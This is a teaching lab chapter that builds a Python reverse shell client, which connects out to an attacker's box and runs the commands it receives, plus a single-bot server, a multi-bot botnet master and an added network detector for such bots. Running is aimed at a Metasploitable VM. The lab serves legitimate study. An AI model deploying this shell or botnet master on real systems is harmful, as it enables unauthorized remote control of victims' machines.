Chapter 6 Reverse shell & BotNet
In this lab we will learn the basics of socket programming by implementing a reverse shell. We then show how this reverse shell can be extended and used to implement a simple botnet.
6.1.1 Sockets and process communication
A socket is a software abstraction that allows programs to communicate over the network. There are two types of sockets in common use: 1) TCP sockets and 2) UDP sockets. TCP sockets ensure that all the data sent over them is reliably delivered across the network; they are commonly used for file transfer and similar applications. UDP sockets trade reliability for speed, and common applications that use UDP are audio and video streaming. In this lab we will use TCP sockets.
6.1.2 Reverse Shell
A reverse shell is a program that is comprised of two parts:
- A communication component that connects to the attacker's computer. This is where the "reverse" part of the name comes from, since the program connects out to the attacker's computer rather than the attacker connecting in to it.
- A shell component that allows the attacker to execute shell commands on the victim's machine and read the results of those commands.
6.2 Setting Up Your Python Environment:
We will be developing our reverse shell in Python, so you will need to set up a Python development environment.
Step 1 Open the
Step 2 Save the blank file by clicking File → Save As and naming it client.py (save the file to your Desktop; this will make it easier to find later in the lab).
6.3 A Reverse Shell Client
Step 3 The code below creates a simple TCP socket that connects to the server, then reads commands from it, runs each one, and sends the output back.

```python
import subprocess
import sys
from socket import *

serverName = sys.argv[1]   # IP address of the attacker's box, given on the command line (see Step 9)
serverPort = 8000
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.connect((serverName, serverPort))
clientSocket.send('Bot reporting for duty'.encode())

command = clientSocket.recv(4096).decode()
while command and command != "exit":   # an empty read means the server closed the connection
    try:
        # run the command and capture its output (stderr too, so error text is visible)
        result = subprocess.run(command.split(" "), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        message = result.stdout
    except OSError as e:   # e.g. the command does not exist
        message = str(e).encode()
    # never send an empty message, otherwise the server blocks forever in recv()
    clientSocket.send(message or b"(no output)\n")
    command = clientSocket.recv(4096).decode()
clientSocket.close()
```
**Step 4** Create a folder called "botnet" on your Kali Desktop. Save the file above as "clientBot.py".
6.4 Reverse Shell Server
Step 5 Now we will write the server that runs on the attacker's box.

```python
from socket import *

serverPort = 8000
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)   # allows restarting the server right away
serverSocket.bind(('', serverPort))
serverSocket.listen(1)
print("Attacker Box Listening and awaiting instructions")

connectionSocket, addr = serverSocket.accept()
print("Thanks for connecting to me bot " + str(addr))
message = connectionSocket.recv(1024)
print(message.decode())

command = ""
while command != "exit":
    command = input("Please enter a command: ")
    connectionSocket.send(command.encode())
    if command == "exit":   # the bot closes its socket on "exit", so there is nothing left to read
        break
    message = connectionSocket.recv(4096)   # large enough for typical command output
    print(message.decode(errors="replace"))
connectionSocket.close()
serverSocket.close()
```
Step 6 Save the file as "serverBot.py" in the "botnet" folder on the Desktop that you created earlier.
6.5 Running the reverse shell
We have placed a copy of the botnet client on the Metasploitable virtual machine. Normally you would use a known vulnerability to gain access to the machine, as you saw during the Armitage lab.
Step 7 Start the botnet server by opening a terminal and navigating to the folder called botnet on the Kali Desktop. Run the file by typing python serverBot.py
[Include screen shot below]
Now the server bot is running and waiting for clients to connect to it, so let's activate the botnet client.
Step 8 Log into the Metasploitable machine using username msfadmin and password msfadmin.
Step 9 cd into the folder called botnet and run the botnet client by typing: python clientBot.py [IP address of your Kali box]. (Remember that you can get the IP address of the Kali Linux box by using the ifconfig command.)
[Include a picture and place botnet client on Armitage machine]
Step 10 Your client bot should now be connected to your server bot. Try executing a whoami command.
[Include a picture]
The example above discusses a single client/server pair. How would we extend it so that a single machine could control several clients at once? This is exactly what happens in a botnet: several client machines connect to a single machine called the botnet master, which then sends commands to all of the machines (bots) that have connected to it. The code below shows how we would extend the server to handle multiple client bots.

```python
from socket import *

serverPort = 8000
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)   # allows restarting the server right away
serverSocket.bind(('', serverPort))
serverSocket.listen(10)   # Ten Bots max waiting in the accept queue
print("Attacker Box Listening and awaiting instructions")

command = ""
while command != "exit":
    # each pass through the loop takes the next bot from the queue and sends it one command
    connectionSocket, addr = serverSocket.accept()
    print("Thanks for connecting to me bot " + str(addr))
    message = connectionSocket.recv(1024)
    print(message.decode())
    command = input("Please enter a command: ")
    connectionSocket.send(command.encode())
    if command != "exit":   # on "exit" the bot closes its socket, so there is nothing to read
        message = connectionSocket.recv(4096)
        print(message.decode(errors="replace"))
    connectionSocket.close()
serverSocket.close()
```
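The master described above is easy to spot from the network side: every bot opens a connection to the same address and port and announces itself with the same plaintext greeting. The detector below is an added example, not part of the lab; it reads a constructed connection log (one line per connection with the first bytes the client sent; the CSV layout, the host addresses and the `find_indicators` function are all assumptions) and flags both the known greeting and the fan-in of several internal hosts onto one non-standard port.

```python
import csv
import io
from collections import defaultdict

# Constructed sample log (not captured from the lab): one line per new TCP
# connection, with the first bytes the client sent. 10.0.0.11-13 run clientBot.py.
SAMPLE_LOG = """\
ts,src,dst,dport,first_payload
1700000000,10.0.0.11,10.0.0.5,8000,Bot reporting for duty
1700000001,10.0.0.12,10.0.0.5,8000,Bot reporting for duty
1700000002,10.0.0.13,10.0.0.5,8000,Bot reporting for duty
1700000003,10.0.0.14,10.0.0.9,443,tls-client-hello
1700000004,10.0.0.14,10.0.0.5,8000,GET / HTTP/1.1
"""

BANNER_PREFIX = "Bot reporting"       # start of the greeting hard-coded in clientBot.py
STANDARD_PORTS = {22, 53, 80, 443}    # ports on which many hosts legitimately fan in


def parse_log(text):
    """Parse the CSV connection log into a list of dicts with integer ports."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["dport"] = int(row["dport"])
    return rows


def find_indicators(rows, min_clients=3):
    """Return findings of two kinds: 'banner' for each connection that opens with
    the bot greeting, and 'fan_in' for any (dst, dport) outside STANDARD_PORTS that
    at least min_clients distinct sources connected to."""
    findings = []
    fan_in = defaultdict(set)
    for row in rows:
        if row["first_payload"].startswith(BANNER_PREFIX):
            findings.append({"type": "banner", "src": row["src"],
                             "dst": row["dst"], "dport": row["dport"]})
        if row["dport"] not in STANDARD_PORTS:
            fan_in[(row["dst"], row["dport"])].add(row["src"])
    for (dst, dport), sources in fan_in.items():
        if len(sources) >= min_clients:
            findings.append({"type": "fan_in", "dst": dst, "dport": dport,
                             "clients": sorted(sources)})
    return findings


if __name__ == "__main__":
    for finding in find_indicators(parse_log(SAMPLE_LOG)):
        print(finding)
```

The fan-in check is the one that survives a renamed greeting: the master still needs every bot to reach the same listening port.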